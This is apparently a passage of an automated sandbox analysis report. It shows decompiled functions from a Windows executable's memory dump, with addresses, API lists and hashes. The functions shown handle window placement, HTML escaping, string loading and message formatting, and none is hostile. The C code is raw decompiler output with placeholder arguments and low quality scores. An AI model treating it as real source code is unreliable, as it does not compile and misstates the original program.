                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                • Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                • Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
                                                                                                                                                • Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                • Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405B17, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                                                0x00405b17
                                                                                                                                                0x00405b2a
                                                                                                                                                0x00405b2d
                                                                                                                                                0x00405b34
                                                                                                                                                0x00405b3a
                                                                                                                                                0x00405b3c
                                                                                                                                                0x00405b4f
                                                                                                                                                0x00405b59
                                                                                                                                                0x00405b60
                                                                                                                                                0x00405b62
                                                                                                                                                0x00405b62
                                                                                                                                                0x00405b75
                                                                                                                                                0x00405b7b
                                                                                                                                                0x00405b86
                                                                                                                                                0x00405b8a
                                                                                                                                                0x00405b8c
                                                                                                                                                0x00405b95
                                                                                                                                                0x00405b96
                                                                                                                                                0x00405b97
                                                                                                                                                0x00405b9d
                                                                                                                                                0x00405b9f
                                                                                                                                                0x00405ba5
                                                                                                                                                0x00405baf
                                                                                                                                                0x00405bb0
                                                                                                                                                0x00405bb1
                                                                                                                                                0x00405bb4
                                                                                                                                                0x00405bb4
                                                                                                                                                0x00405b8a
                                                                                                                                                0x00405bbb
                                                                                                                                                0x00405bbe
                                                                                                                                                0x00405bcd
                                                                                                                                                0x00405bd4
                                                                                                                                                0x00405bc0
                                                                                                                                                0x00405bc0
                                                                                                                                                0x00405bc0
                                                                                                                                                0x00405bdb
                                                                                                                                                0x00405bde
                                                                                                                                                0x00405bf3
                                                                                                                                                0x00405bf3
                                                                                                                                                0x00000000
                                                                                                                                                0x00405be0
                                                                                                                                                0x00405be9
                                                                                                                                                0x00405bee
                                                                                                                                                0x00405bf1
                                                                                                                                                0x00405bf5
                                                                                                                                                0x00405bf7
                                                                                                                                                0x00405bf9
                                                                                                                                                0x00405bf9
                                                                                                                                                0x00405c16
                                                                                                                                                0x00405c16
                                                                                                                                                0x00000000
                                                                                                                                                0x00405bf1

                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00405B30
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00405B36
                                                                                                                                                • GetDC.USER32(00000000), ref: 00405B43
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
                                                                                                                                                • ReleaseDC.USER32 ref: 00405B62
                                                                                                                                                • GetWindowRect.USER32 ref: 00405B75
                                                                                                                                                • GetParent.USER32(?), ref: 00405B80
                                                                                                                                                • GetWindowRect.USER32 ref: 00405B9D
                                                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                • Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                • Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
                                                                                                                                                • Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                • Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DBDA, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 16%
                                                                                                                                                			E0040DBDA(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                0x0040dbdf
                                                                                                                                                0x0040dbe1
                                                                                                                                                0x0040dbe3
                                                                                                                                                0x0040dbe4
                                                                                                                                                0x0040dbe4
                                                                                                                                                0x0040dbeb
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040dbed
                                                                                                                                                0x0040dbee
                                                                                                                                                0x0040dc56
                                                                                                                                                0x0040dc57
                                                                                                                                                0x0040dc5c
                                                                                                                                                0x0040dc5f
                                                                                                                                                0x0040dc68
                                                                                                                                                0x0040dc6c
                                                                                                                                                0x0040dc6f
                                                                                                                                                0x00000000
                                                                                                                                                0x0040dc6f
                                                                                                                                                0x0040dc78
                                                                                                                                                0x0040dbf5
                                                                                                                                                0x0040dbf9
                                                                                                                                                0x0040dc07
                                                                                                                                                0x0040dc24
                                                                                                                                                0x0040dc33
                                                                                                                                                0x0040dc4e
                                                                                                                                                0x0040dc63
                                                                                                                                                0x0040dc67
                                                                                                                                                0x0040dc50
                                                                                                                                                0x0040dc50
                                                                                                                                                0x0040dc51
                                                                                                                                                0x00000000
                                                                                                                                                0x0040dc51
                                                                                                                                                0x0040dc35
                                                                                                                                                0x0040dc35
                                                                                                                                                0x0040dc37
                                                                                                                                                0x00000000
                                                                                                                                                0x0040dc37
                                                                                                                                                0x0040dc26
                                                                                                                                                0x0040dc26
                                                                                                                                                0x0040dc28
                                                                                                                                                0x0040dc3c
                                                                                                                                                0x0040dc3d
                                                                                                                                                0x0040dc42
                                                                                                                                                0x0040dc45
                                                                                                                                                0x0040dc45
                                                                                                                                                0x0040dc09
                                                                                                                                                0x0040dc11
                                                                                                                                                0x0040dc16
                                                                                                                                                0x0040dc19
                                                                                                                                                0x0040dc19
                                                                                                                                                0x0040dbfb
                                                                                                                                                0x0040dbfb
                                                                                                                                                0x0040dbfc
                                                                                                                                                0x00000000
                                                                                                                                                0x0040dbfc
                                                                                                                                                0x00000000
                                                                                                                                                0x0040dbf9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                • Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                • Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
                                                                                                                                                • Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                • Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406827, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                			E00406827(signed short __ebx) {
				signed int _t21;
				void* _t22;
				intOrPtr _t23;
				struct HINSTANCE__* _t25;
				signed int _t27;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				void* _t35;
				signed short _t39;
				signed int _t40;
				signed int _t42;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;
				void* _t72;
				void* _t73;

				_t39 = __ebx;
				if( *0x413288 == 0) {
					E00406785();
				}
				_t40 =  *0x413280; // 0x18
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(1) {
						_t55 =  *0x413278; // 0xb17090
						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
							break;
						}
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t52 =  *0x41327c; // 0xb17498
					_t53 =  *0x413270; // 0xa10048
					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x412c38 == 0) {
							_t23 =  *0x413290; // 0x1000
							_push(_t23 - 1);
							_push( *0x413274);
							_push(_t39);
							_t25 = E0040698D();
							goto L15;
						} else {
							wcscpy(0x412e48, L"strings");
							_t35 = E00406D16(_t39,  *0x413274);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_t46 =  *0x413290; // 0x1000
								_push(_t46 - 1);
								_push( *0x413274);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x413274);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_t49 =  *0x413290; // 0x1000
						_push(_t49 - 1);
						_push( *0x413274);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40f454;
					} else {
						_t27 =  *0x413284; // 0xcd
						_t10 = _t61 + 2; // 0xcf
						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
						if(_t72 >= 0) {
							goto L20;
						} else {
							_t42 =  *0x413280; // 0x18
							_t73 = _t42 -  *0x41328c; // 0x100
							if(_t73 >= 0) {
								goto L20;
							} else {
								_t43 =  *0x413270; // 0xa10048
								_t57 = _t43 + _t27 * 2;
								_t14 = _t61 + 2; // 0x2
								memcpy(_t57,  *0x413274, _t61 + _t14);
								_t30 =  *0x413280; // 0x18
								_t44 =  *0x413284; // 0xcd
								_t54 =  *0x41327c; // 0xb17498
								 *(_t54 + _t30 * 4) = _t44;
								_t31 =  *0x413280; // 0x18
								_t45 =  *0x413278; // 0xb17090
								 *(_t45 + _t31 * 4) = _t39;
								_t32 =  *0x413284; // 0xcd
								 *0x413280 =  *0x413280 + 1;
								 *0x413284 = _t32 + _t61 + 1;
								if(_t57 != 0) {
									goto L21;
								} else {
									goto L20;
								}
							}
						}
					}
				}
				return _t22;
			}






























                                                                                                                                                0x00406827
                                                                                                                                                0x0040682e
                                                                                                                                                0x00406830
                                                                                                                                                0x00406830
                                                                                                                                                0x00406835
                                                                                                                                                0x0040683c
                                                                                                                                                0x00406841
                                                                                                                                                0x00406853
                                                                                                                                                0x00406853
                                                                                                                                                0x00406843
                                                                                                                                                0x00406843
                                                                                                                                                0x00406843
                                                                                                                                                0x0040684c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040684e
                                                                                                                                                0x00406851
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406851
                                                                                                                                                0x00406880
                                                                                                                                                0x00406889
                                                                                                                                                0x0040688f
                                                                                                                                                0x0040688f
                                                                                                                                                0x00406855
                                                                                                                                                0x00406857
                                                                                                                                                0x00406988
                                                                                                                                                0x00406988
                                                                                                                                                0x0040685d
                                                                                                                                                0x00406863
                                                                                                                                                0x0040689c
                                                                                                                                                0x004068eb
                                                                                                                                                0x004068f1
                                                                                                                                                0x004068f2
                                                                                                                                                0x004068f8
                                                                                                                                                0x004068f9
                                                                                                                                                0x00000000
                                                                                                                                                0x0040689e
                                                                                                                                                0x004068a8
                                                                                                                                                0x004068b4
                                                                                                                                                0x004068b9
                                                                                                                                                0x004068be
                                                                                                                                                0x004068d2
                                                                                                                                                0x004068d4
                                                                                                                                                0x004068da
                                                                                                                                                0x004068e1
                                                                                                                                                0x004068e2
                                                                                                                                                0x004068e8
                                                                                                                                                0x00000000
                                                                                                                                                0x004068c0
                                                                                                                                                0x004068cb
                                                                                                                                                0x004068d0
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004068d0
                                                                                                                                                0x004068be
                                                                                                                                                0x00406865
                                                                                                                                                0x00406866
                                                                                                                                                0x0040686c
                                                                                                                                                0x00406873
                                                                                                                                                0x00406874
                                                                                                                                                0x0040687d
                                                                                                                                                0x004068fe
                                                                                                                                                0x00406905
                                                                                                                                                0x00406907
                                                                                                                                                0x00406907
                                                                                                                                                0x00406909
                                                                                                                                                0x00406981
                                                                                                                                                0x00406981
                                                                                                                                                0x0040690b
                                                                                                                                                0x0040690b
                                                                                                                                                0x00406910
                                                                                                                                                0x00406914
                                                                                                                                                0x0040691a
                                                                                                                                                0x00000000
                                                                                                                                                0x0040691c
                                                                                                                                                0x0040691c
                                                                                                                                                0x00406922
                                                                                                                                                0x00406928
                                                                                                                                                0x00000000
                                                                                                                                                0x0040692a
                                                                                                                                                0x0040692a
                                                                                                                                                0x00406930
                                                                                                                                                0x00406933
                                                                                                                                                0x0040693f
                                                                                                                                                0x00406944
                                                                                                                                                0x00406949
                                                                                                                                                0x0040694f
                                                                                                                                                0x00406955
                                                                                                                                                0x00406958
                                                                                                                                                0x0040695d
                                                                                                                                                0x00406963
                                                                                                                                                0x00406966
                                                                                                                                                0x0040696e
                                                                                                                                                0x0040697a
                                                                                                                                                0x0040697f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040697f
                                                                                                                                                0x00406928
                                                                                                                                                0x0040691a
                                                                                                                                                0x00406909
                                                                                                                                                0x0040698c

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                • wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
                                                                                                                                                  • Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37
                                                                                                                                                • wcslen.MSVCRT ref: 004068C6
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                • LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                • memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
                                                                                                                                                  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
                                                                                                                                                  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
                                                                                                                                                  • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                • String ID: strings
                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                • Opcode ID: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                • Instruction ID: b83127d2a15bee255c74f42c5a27ad94469461630f4946f0f4b43b8e5d041769
                                                                                                                                                • Opcode Fuzzy Hash: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                • Instruction Fuzzy Hash: 1641B375200102AFDB14FF18ED849B673A1F754306711C1FEE806B76A1DB7AAA22CB5C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406050, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                			E00406050(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t52);
					_push( *((intOrPtr*)(_t52 - 4)));
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040DFD6();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                                                0x0040605b
                                                                                                                                                0x0040606a
                                                                                                                                                0x00406071
                                                                                                                                                0x00406079
                                                                                                                                                0x0040607c
                                                                                                                                                0x0040607f
                                                                                                                                                0x00406082
                                                                                                                                                0x00406089
                                                                                                                                                0x00406089
                                                                                                                                                0x00406091
                                                                                                                                                0x00406094
                                                                                                                                                0x00406099
                                                                                                                                                0x0040609e
                                                                                                                                                0x0040609f
                                                                                                                                                0x004060ab
                                                                                                                                                0x004060b0
                                                                                                                                                0x004060c3
                                                                                                                                                0x004060cd
                                                                                                                                                0x004060d1
                                                                                                                                                0x004060d6
                                                                                                                                                0x004060e4
                                                                                                                                                0x004060ec
                                                                                                                                                0x004060ef
                                                                                                                                                0x004060f2
                                                                                                                                                0x004060f2
                                                                                                                                                0x004060f5
                                                                                                                                                0x004060f5
                                                                                                                                                0x004060fb
                                                                                                                                                0x004060fe
                                                                                                                                                0x00406102
                                                                                                                                                0x0040610c

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                                                • Opcode ID: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                • Instruction ID: f719391f3769af673f645ccb22e5d53aea3ed69308020c87343d88254f0aea6b
                                                                                                                                                • Opcode Fuzzy Hash: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                • Instruction Fuzzy Hash: 27119072800119EBCF20DF95CC45ECAB7F9FF00308F1144BAE944B7152EBB5A6588B94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406F88, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                			E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040E340(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040E03E();
					if(_t26 != 0) {
						E00406E5E(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                                                0x00406f90
                                                                                                                                                0x00406fa6
                                                                                                                                                0x00406fad
                                                                                                                                                0x00406fb8
                                                                                                                                                0x00406fbe
                                                                                                                                                0x00406fcf
                                                                                                                                                0x00406fd7
                                                                                                                                                0x00406fef
                                                                                                                                                0x00406ff6
                                                                                                                                                0x0040700d
                                                                                                                                                0x00407013
                                                                                                                                                0x00407019
                                                                                                                                                0x0040701e
                                                                                                                                                0x0040701f
                                                                                                                                                0x00407028
                                                                                                                                                0x00407032
                                                                                                                                                0x00407038
                                                                                                                                                0x00407028
                                                                                                                                                0x0040703f

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                • Opcode ID: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                • Instruction ID: 57a1b33134393eb8e1d887e85ad6c32cde466d51f9494c9a374c65f7fd7f5279
                                                                                                                                                • Opcode Fuzzy Hash: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                • Instruction Fuzzy Hash: 0C11A7329042197ADB24EF91DD49A9B7B7CEF04750F0040BAF508E2091E7755A55CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004052B3, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E004052B3(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40f454);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                0x004052b3
                                                                                                                                                0x004052c1
                                                                                                                                                0x004052c9
                                                                                                                                                0x004052ce
                                                                                                                                                0x004052d8
                                                                                                                                                0x004052e0
                                                                                                                                                0x004052e2
                                                                                                                                                0x004052e2
                                                                                                                                                0x004052e0
                                                                                                                                                0x004052fe
                                                                                                                                                0x0040532d
                                                                                                                                                0x00405300
                                                                                                                                                0x0040530b
                                                                                                                                                0x00405313
                                                                                                                                                0x00405319
                                                                                                                                                0x0040531d
                                                                                                                                                0x0040531d
                                                                                                                                                0x00405337

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
